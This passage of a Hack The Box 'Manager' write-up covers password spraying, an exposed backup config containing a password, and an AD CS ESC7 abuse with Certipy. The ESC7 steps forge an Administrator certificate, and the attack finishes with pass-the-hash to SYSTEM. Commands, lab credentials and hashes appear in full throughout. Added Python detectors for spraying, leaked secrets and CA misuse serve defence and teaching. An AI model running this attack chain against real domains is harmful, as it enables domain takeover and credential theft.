SMB         10.129.160.212  445    DC01             [-] manager.htb\Cheng:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Ryan:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\Raven:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JinWoo:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ChinHae:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\zhong:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\cheng:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ryan:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\raven:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\jinWoo:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\chinHae:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\ZHONG:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHENG:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RYAN:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\RAVEN:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\JINWOO:OPERATOR STATUS_LOGON_FAILURE 
SMB         10.129.160.212  445    DC01             [-] manager.htb\CHINHAE:OPERATOR STATUS_LOGON_FAILURE 
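
Seen from the defender's side, the output above is one source failing against many accounts within seconds, with a success in the middle. The detector below is an added example, not part of the original writeup. The event fields, source addresses, window and threshold are assumptions, and the sample events are constructed. It folds name case before counting, because `Operator`, `operator` and `OPERATOR` are a single AD account, which is why the tool printed three `[+]` lines.

```python
from collections import Counter, defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class LogonEvent:
    """One authentication record, e.g. built from Windows Security events
    4625 (failed logon) and 4624 (successful logon)."""
    ts: datetime
    source_ip: str
    account: str   # user name exactly as it was logged
    success: bool


def normalize(account: str) -> str:
    """Drop a DOMAIN\\ prefix and fold case so spelling variants of one
    account are counted once."""
    return account.rsplit("\\", 1)[-1].casefold()


def detect_spray(events, window=timedelta(minutes=5), min_accounts=5):
    """Flag every source that fails against >= min_accounts distinct accounts
    inside one sliding window. Returns {source_ip: alert}."""
    recent = defaultdict(deque)    # source_ip -> failures still inside the window
    totals = defaultdict(Counter)  # source_ip -> failures per normalized account
    alerts = {}
    for ev in sorted(events, key=lambda e: e.ts):
        acct = normalize(ev.account)
        failures = recent[ev.source_ip]
        while failures and ev.ts - failures[0][0] > window:
            failures.popleft()
        if ev.success:
            # A success from an already flagged source means a guess worked.
            if ev.source_ip in alerts:
                alerts[ev.source_ip]["compromised"].add(acct)
            continue
        failures.append((ev.ts, acct))
        totals[ev.source_ip][acct] += 1
        distinct = {a for _, a in failures}
        if len(distinct) >= min_accounts and ev.source_ip not in alerts:
            alerts[ev.source_ip] = {
                "first_failure": failures[0][0],
                "failures": totals[ev.source_ip],  # live counter, keeps growing
                "compromised": set(),
            }
    return alerts


def sample_events():
    """Constructed events for the demo, not taken from a real log."""
    t0 = datetime(2024, 1, 1, 9, 0, 0)
    names = ["Zhong", "Cheng", "Ryan", "Raven", "JinWoo", "ChinHae", "Operator"]
    variants = names + [n.lower() for n in names] + [n.upper() for n in names]
    events = []
    # Spraying source: two password rounds over every spelling of every name;
    # only the second round against the operator account succeeds.
    for rnd in range(2):
        for i, name in enumerate(variants):
            ts = t0 + timedelta(seconds=rnd * 30 + i)
            ok = rnd == 1 and name.casefold() == "operator"
            events.append(LogonEvent(ts, "192.0.2.10", "manager.htb\\" + name, ok))
    # Benign source: one user mistypes twice, then logs on.
    for i, ok in enumerate([False, False, True]):
        events.append(LogonEvent(t0 + timedelta(seconds=10 * i), "192.0.2.20", "raven", ok))
    # Nine spellings of three real accounts: a raw string count would see nine
    # "users", the normalized count sees three and stays under the threshold.
    few = [v for v in variants if v.casefold() in {"zhong", "cheng", "ryan"}]
    for i, name in enumerate(few):
        events.append(LogonEvent(t0 + timedelta(seconds=i), "192.0.2.30", name, False))
    return events


if __name__ == "__main__":
    for src, alert in detect_spray(sample_events()).items():
        print(src, "first failure:", alert["first_failure"].isoformat())
        print("  failures per account:", dict(alert["failures"]))
        print("  accounts with a later success:", sorted(alert["compromised"]))
```

The per-account failure counts are also what to compare against the domain lockout threshold, since every spelling variant counts against the same account.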

LDAP Enumeration

Since we have valid credentials, I will use ldapdomaindump to dump as much information about the domain as possible

# ldapdomaindump 10.129.165.27 -u 'manager.htb\operator' -p 'operator' --no-json --no-grep
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

We start an HTTP server with Python in the same directory

# python -m http.server 80        

We browse to http://localhost/

We click on domain_users.html and list the domain users and the groups they belong to. In this case the user raven belongs to the Remote Management Users group, which means that if we obtain their credentials we could connect over WinRM

MSSQL Enumeration

Since we have valid credentials, we are going to enumerate the MSSQL server with the msdat tool https://github.com/quentinhardy/msdat to see which commands we can use

# python3 msdat.py all -s 10.129.160.212 -D manager.htb -U operator -P operator  

[1] (10.129.160.212:1433): Testing the 'master' database with the account operator/operator
[1.1] Can the current user become sysadmin with trustworthy database method ?
[-] KO
[1.2] You can steal hashed passwords ?
[+] OK
[1.3] Can we execute system commands with xpcmdshell (directly) ?
[-] KO
[1.4] Can we re-enable xpcmdshell to use xpcmdshell ?
[-] KO
[1.5] Can you use SQL Server Agent Stored Procedures (jobs) to execute system commands?
[-] KO
[-] KO
[1.6] Can you capture a SMB authentication ?
[+] ? (perhaps)
[1.7] Can you use OLE Automation to read files ?
[-] KO
[1.8] Can you use OLE Automation to write files ?
[-] KO
[1.9] Can you use OLE Automation to execute Windows system commands ?
[-] KO
[1.10] Can you use Bulk Insert to read files ?
[-] KO
[1.11] Can you use Openrowset to read files ?
[-] KO
[1.12] Can you connect to remote databases with openrowset ? (useful for dictionary attacks)
[-] KO
[1.13] Can you list files with xp_dirtree ?
[+] OK
[1.14] Can you list directories with xp_subdirs ?
[-] KO
[1.15] Can you list drives with xp_subdirs ?
[+] OK
[1.16] Can you list medias with xp_availablemedia ?
[-] KO
[1.17] Can you check if a file exist thanks to xp_fileexist ?
[+] OK
[1.18] Can you create a folder with xp_createsubdir ?
[-] KO


[2] (10.129.160.212:1433): MSSQL users have not the password identical to the username ?
The login sa has already been tested at least once. What do you want to do:                                                                                           | ETA:  00:00:00 
- stop (s/S)
- continue and ask every time (a/A)
- continue without to ask (c/C)
c
100% |################################################################################################################################################################| Time: 00:00:41 
[-] No found a valid account on 10.129.160.212:1433 in UsernameLikePassword module

Since nmap reported that IIS is running, we connect and list the contents of the path where IIS is hosted

# impacket-mssqlclient WORKGROUP/operator@10.129.165.27 -windows-auth                 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (MANAGER\Operator  guest@master)> xp_dirtree
subdirectory                depth   file   
-------------------------   -----   ----   
$Recycle.Bin                    1      0   

Documents and Settings          1      0   

inetpub                         1      0   

PerfLogs                        1      0   

Program Files                   1      0   

Program Files (x86)             1      0   

ProgramData                     1      0   

Recovery                        1      0   

SQL2019                         1      0   

System Volume Information       1      0   

Users                           1      0   

Windows                         1      0   

SQL (MANAGER\Operator  guest@master)> xp_dirtree C:\inetpub
subdirectory   depth   file   
------------   -----   ----   
custerr            1      0   

history            1      0   

logs               1      0   

temp               1      0   

wwwroot            1      0   

SQL (MANAGER\Operator  guest@master)> xp_dirtree C:\inetpub\wwwroot
subdirectory                      depth   file   
-------------------------------   -----   ----   
about.html                            1      1   

contact.html                          1      1   

css                                   1      0   

images                                1      0   

index.html                            1      1   

js                                    1      0   

service.html                          1      1   

web.config                            1      1   

website-backup-27-07-23-old.zip       1      1

If we browse to this path on the website, http://10.129.165.27/website-backup-27-07-23-old.zip, a zip file is downloaded. We extract the zip and list all of its contents.

# ls -la
drwxrwxr-x justice-reaper justice-reaper  4.0 KB Tue Sep 17 11:58:55 2024  .
drwxrwxr-x justice-reaper justice-reaper  4.0 KB Tue Sep 17 11:58:35 2024  ..
drwxrwxr-x justice-reaper justice-reaper  4.0 KB Tue Sep 17 11:58:55 2024  css
drwxrwxr-x justice-reaper justice-reaper  4.0 KB Tue Sep 17 11:58:55 2024  images
drwxrwxr-x justice-reaper justice-reaper  4.0 KB Tue Sep 17 11:58:55 2024  js
.rw-rw-r--    justice-reaper justice-reaper  698 B  Thu Jul 27 05:35:54 2023  .old-conf.xml
.rw-rw-r--    justice-reaper justice-reaper  5.3 KB Thu Jul 27 05:32:30 2023  about.html
.rw-rw-r--    justice-reaper justice-reaper  5.2 KB Thu Jul 27 05:32:14 2023  contact.html
.rw-rw-r--    justice-reaper justice-reaper   18 KB Thu Jul 27 05:32:22 2023  index.html
.rw-rw-r--    justice-reaper justice-reaper  7.7 KB Thu Jul 27 05:32:08 2023  service.html
.rw-rw-r--    justice-reaper justice-reaper 1021 KB Tue Sep 17 11:56:58 2024  website-backup-27-07-23-old.zip

In the .old-conf.xml file we find the credentials of the user raven

# cat .old-conf.xml   
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
   <server>
      <host>dc01.manager.htb</host>
      <open-port enabled="true">389</open-port>
      <secure-port enabled="false">0</secure-port>
      <search-base>dc=manager,dc=htb</search-base>
      <server-type>microsoft</server-type>
      <access-user>
         <user>raven@manager.htb</user>
         <password>R4v3nBe5tD3veloP3r!123</password>
      </access-user>
      <uid-attribute>cn</uid-attribute>
   </server>
   <search type="full">
      <dir-list>
         <dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
      </dir-list>
   </search>
</ldap-conf>
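
A defender-side check for the exposure shown above, as an added example that is not part of the original post: it scans an archive found under a web root for XML elements whose tag name suggests a stored credential. The archive is constructed in memory, and the function names and the SECRET_TAGS list are assumptions.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Tag names that commonly hold secrets in XML configs (assumed list, extend as needed).
SECRET_TAGS = {"password", "passwd", "pwd", "secret", "token", "apikey"}


def local_name(tag):
    """Strip an XML namespace such as '{ns}password' and lowercase the result."""
    return tag.rsplit("}", 1)[-1].lower()


def scan_archive(data):
    """Return (member, element_path, value_length) for each non-empty secret element.

    The secret value itself is never returned, so the report can be shared safely.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith((".xml", ".config")):
                continue
            try:
                root = ET.fromstring(zf.read(info))
            except ET.ParseError:
                continue  # not well-formed XML, nothing to inspect
            stack = [(root, local_name(root.tag))]
            while stack:
                elem, path = stack.pop()
                text = (elem.text or "").strip()
                if local_name(elem.tag) in SECRET_TAGS and text:
                    findings.append((info.filename, path, len(text)))
                for child in elem:
                    stack.append((child, path + "/" + local_name(child.tag)))
    return findings


def build_sample_archive():
    """Constructed sample: a site backup that carries a hidden LDAP config file."""
    conf = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        "<ldap-conf><server><host>dc01.example.test</host>"
        "<access-user><user>svc@example.test</user>"
        "<password>CONSTRUCTED-PLACEHOLDER</password></access-user>"
        "</server></ldap-conf>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("index.html", "<html></html>")
        zf.writestr(".old-conf.xml", conf)
        zf.writestr("web.config", "<configuration/>")
    return buf.getvalue()


if __name__ == "__main__":
    for name, path, length in scan_archive(build_sample_archive()):
        print(f"{name}: {path} holds a {length}-character value")
```

Run against every archive that a deployment job would publish, a non-empty result is a reason to block the release and rotate the account named in the file.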

Intrusion

We connect to the victim machine

# evil-winrm -i '10.129.165.27' -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> whoami
manager\raven

Privilege Escalation

We synchronize our clock with the victim machine's

# sudo ntpdate 10.129.165.27
2024-08-17 00:51:21.613694 (+0200) +408.815789 +/- 0.029180 10.129.238.223 s1 no-leap
CLOCK: time stepped by 408.815789

We download adPEAS.ps1 from https://github.com/61106960/adPEAS.git and upload it to the victim machine.

# evil-winrm -i '10.129.165.27' -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> upload adPEAS.ps1
                                        
Info: Uploading /home/justice-reaper/Downloads/adPEAS.ps1 to C:\Users\Raven\Documents\adPEAS.ps1
                                        
Data: 4655524 bytes of 4655524 bytes copied
                                        
Info: Upload successful!

We import the PowerShell module

*Evil-WinRM* PS C:\Users\Raven\Documents> Import-Module .\adPEAS.ps1

We run adPEAS

*Evil-WinRM* PS C:\Users\Raven\Documents> Invoke-adPEAS

It detects several templates and recommends using Certipy https://github.com/ly4k/Certipy.git or Certify https://github.com/GhostPack/Certify.git

[?] +++++ Searching for Active Directory Certificate Services Information +++++
[+] Found at least one available Active Directory Certificate Service
adPEAS does basic enumeration only, consider reading https://posts.specterops.io/certified-pre-owned-d95910965cd2

[+] Found Active Directory Certificate Services 'manager-DC01-CA':
CA Name:				manager-DC01-CA
CA dnshostname:				dc01.manager.htb
CA IP Address:				10.129.165.27
Date of Creation:			07/27/2023 10:31:05
DistinguishedName:			CN=manager-DC01-CA,CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=manager,DC=htb
NTAuthCertificates:			True
Available Templates:			SubCA
					DirectoryEmailReplication
					DomainControllerAuthentication
					KerberosAuthentication
					EFSRecovery
					EFS
					DomainController
					WebServer
					Machine
					User
					Administrator

[?] +++++ Searching for Vulnerable Certificate Templates +++++
adPEAS does basic enumeration only, consider using https://github.com/GhostPack/Certify or https://github.com/ly4k/Certipy

[?] +++++ Checking Template 'SubCA' +++++
[!] Template 'SubCA' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name:				SubCA
Template distinguishedname:		CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=manager,DC=htb
Date of Creation:			07/27/2023 10:31:05
EnrollmentFlag:				0
[!] CertificateNameFlag:		ENROLLEE_SUPPLIES_SUBJECT

[?] +++++ Checking Template 'DirectoryEmailReplication' +++++

[?] +++++ Checking Template 'DomainControllerAuthentication' +++++

[?] +++++ Checking Template 'KerberosAuthentication' +++++

[?] +++++ Checking Template 'EFSRecovery' +++++

[?] +++++ Checking Template 'EFS' +++++
[+] Identity 'MANAGER\Domain Users' has enrollment rights for template 'EFS'
Template Name:				EFS
Template distinguishedname:		CN=EFS,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=manager,DC=htb
Date of Creation:			07/27/2023 10:31:05
Extended Key Usage:			Encrypting File System
EnrollmentFlag:				INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag:			SUBJECT_ALT_REQUIRE_UPN, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for:		MANAGER\Domain Users

[?] +++++ Checking Template 'DomainController' +++++

[?] +++++ Checking Template 'WebServer' +++++
[!] Template 'WebServer' has Flag 'ENROLLEE_SUPPLIES_SUBJECT'
Template Name:				WebServer
Template distinguishedname:		CN=WebServer,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=manager,DC=htb
Date of Creation:			07/27/2023 10:31:05
Extended Key Usage:			Server Authentication
EnrollmentFlag:				0
[!] CertificateNameFlag:		ENROLLEE_SUPPLIES_SUBJECT

[?] +++++ Checking Template 'Machine' +++++
[+] Identity 'MANAGER\Domain Computers' has enrollment rights for template 'Machine'
Template Name:				Machine
Template distinguishedname:		CN=Machine,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=manager,DC=htb
Date of Creation:			07/27/2023 10:31:05
[+] Extended Key Usage:			Client Authentication, Server Authentication
EnrollmentFlag:				AUTO_ENROLLMENT
CertificateNameFlag:			SUBJECT_ALT_REQUIRE_DNS, SUBJECT_REQUIRE_DNS_AS_CN
[+] Enrollment allowed for:		MANAGER\Domain Computers

[?] +++++ Checking Template 'User' +++++
[+] Identity 'MANAGER\Domain Users' has enrollment rights for template 'User'
Template Name:				User
Template distinguishedname:		CN=User,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=manager,DC=htb
Date of Creation:			07/27/2023 10:31:05
[+] Extended Key Usage:			Encrypting File System, Secure E-mail, Client Authentication
EnrollmentFlag:				INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS, AUTO_ENROLLMENT
CertificateNameFlag:			SUBJECT_ALT_REQUIRE_UPN, SUBJECT_ALT_REQUIRE_EMAIL, SUBJECT_REQUIRE_EMAIL, SUBJECT_REQUIRE_DIRECTORY_PATH
[+] Enrollment allowed for:		MANAGER\Domain Users

In my case I am going to use Certipy

# pip3 install certipy-ad

We look for vulnerabilities and find ESC7

# certipy-ad find -u raven@manage.htb -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.165.27 -vulnerable -stdout  
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                              : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates                   : [!] Could not find any certificate templates
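
The same finding expressed as a repeatable audit, as an added example that is not part of the original post or of Certipy: it parses the permissions block of the text output shown above and reports any principal outside an expected admin baseline that holds ManageCa or ManageCertificates. The EXPECTED_ADMINS baseline and the function names are assumptions.

```python
import re

# Principals expected to administer a CA (assumed baseline, adjust per environment).
EXPECTED_ADMINS = {"administrators", "domain admins", "enterprise admins"}
SENSITIVE_RIGHTS = ("ManageCa", "ManageCertificates")

# "key   : value" lines; continuation lines carry a value only.
KEY_LINE = re.compile(r"^\s*(\S.*?)\s+: (.*)$")

# Excerpt of the Certipy text output shown above.
SAMPLE = r"""
    CA Name                             : manager-DC01-CA
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
    [!] Vulnerabilities
"""


def parse_rights(text):
    """Map each 'key : value' entry to its values, folding continuation lines."""
    rights, key, key_end = {}, None, 0
    for line in text.splitlines():
        m = KEY_LINE.match(line)
        if m:
            key, key_end = m.group(1), m.end(1)
            rights[key] = [m.group(2).strip()]
        elif key and line.strip() and len(line) - len(line.lstrip()) > key_end:
            rights[key].append(line.strip())  # indented past the key: another value
        else:
            key = None  # section header or blank line ends the entry
    return rights


def unexpected_ca_managers(text):
    """Return {right: [principals]} for CA rights held outside EXPECTED_ADMINS."""
    rights = parse_rights(text)
    report = {}
    for right in SENSITIVE_RIGHTS:
        extra = [p for p in rights.get(right, [])
                 if p.split("\\")[-1].lower() not in EXPECTED_ADMINS]
        if extra:
            report[right] = extra
    return report


if __name__ == "__main__":
    print(unexpected_ca_managers(SAMPLE))
```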

If you only have the Manage CA access right, you can grant yourself the Manage Certificates access right by adding your user as a new officer

# certipy-ad ca -ca manager-DC01-CA -add-officer raven -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'

The SubCA template can be enabled on the CA with the -enable-template parameter. By default, the SubCA template is enabled

# certipy-ad ca -ca manager-DC01-CA -enable-template SubCA -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'

If we have met the prerequisites for this attack, we can start by requesting a certificate based on the SubCA template. This request will be denied, but we will save the private key and note down the request ID

# certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target manager.htb -template SubCA -upn administrator@manager.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 25
Would you like to save the private key? (y/N) y
[*] Saved private key to 25.key
[-] Failed to request certificate

With our Manage CA and Manage Certificates permissions, we can issue the failed certificate request using the ca command and the -issue-request <request ID> parameter

# certipy-ad ca -ca manager-DC01-CA -issue-request 25 -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate

And finally, we can retrieve the issued certificate with the req command and the -retrieve <request ID> parameter

# certipy-ad req -username raven@manager.htb -password 'R4v3nBe5tD3veloP3r!123' -ca manager-DC01-CA -target manager.htb -retrieve 25 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 25
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '25.key'
[*] Saved certificate and private key to 'administrator.pfx'

By default, Certipy will try to extract the username and domain from the certificate (-pfx) for Kerberos authentication

# certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.165.27 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
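
How the sequence above looks from the CA's audit log, as an added detection example that is not part of the original post: a request that the CA denies and then issues shortly afterwards, preceded by a change to the CA's permissions. It assumes CA auditing is enabled and that events 4882, 4887 and 4888 are collected; the event records are constructed and simplified, and the field and function names are hypothetical.

```python
from datetime import datetime, timedelta

# AD CS audit events: CA permissions changed, request issued, request denied.
PERMS_CHANGED, ISSUED, DENIED = 4882, 4887, 4888
WINDOW = timedelta(hours=1)  # assumed correlation window

# Constructed, simplified events; real records carry more fields.
EVENTS = [
    {"ts": "2024-08-17T00:52:10", "id": 4882, "request_id": None},
    {"ts": "2024-08-17T00:53:02", "id": 4888, "request_id": 25, "requester": "MANAGER\\Raven"},
    {"ts": "2024-08-17T00:53:40", "id": 4887, "request_id": 25, "requester": "MANAGER\\Raven"},
    {"ts": "2024-08-17T09:15:00", "id": 4887, "request_id": 26, "requester": "MANAGER\\DC01$"},
]


def denied_then_issued(events, window=WINDOW):
    """Flag request IDs that were denied and then issued within the window.

    Each alert also records whether the CA's permissions changed in the window
    before the denial, which is what adding a new officer produces.
    """
    denied, perm_changes, alerts = {}, [], []
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        if ev["id"] == PERMS_CHANGED:
            perm_changes.append(ts)
        elif ev["id"] == DENIED:
            denied[ev["request_id"]] = ts
        elif ev["id"] == ISSUED and ev["request_id"] in denied:
            denied_at = denied.pop(ev["request_id"])
            if ts - denied_at > window:
                continue  # too far apart to treat as one sequence
            alerts.append({
                "request_id": ev["request_id"],
                "requester": ev.get("requester"),
                "denied_at": denied_at.isoformat(),
                "issued_at": ts.isoformat(),
                "ca_permissions_changed": any(
                    timedelta(0) <= denied_at - p <= window for p in perm_changes
                ),
            })
    return alerts


if __name__ == "__main__":
    for alert in denied_then_issued(EVENTS):
        print(alert)
```

A certificate issued this way can be revoked on the CA by its request ID, and the officer and ManageCa entries that made it possible should be removed at the same time.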

Once we have the NTLM hash of the Administrator user, we can perform Pass the Hash and authenticate with psexec

# impacket-psexec 'manage.htb/administrator@10.129.165.27' -hashes ':ae5064c2f62317332c88629e025924ef'       

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.129.165.27.....
[*] Found writable share ADMIN$
[*] Uploading file lBtpaDYZ.exe
[*] Opening SVCManager on 10.129.165.27.....
[*] Creating service ulyf on 10.129.165.27.....
[*] Starting service ulyf.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4974]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
This post is licensed under CC BY 4.0 by the author.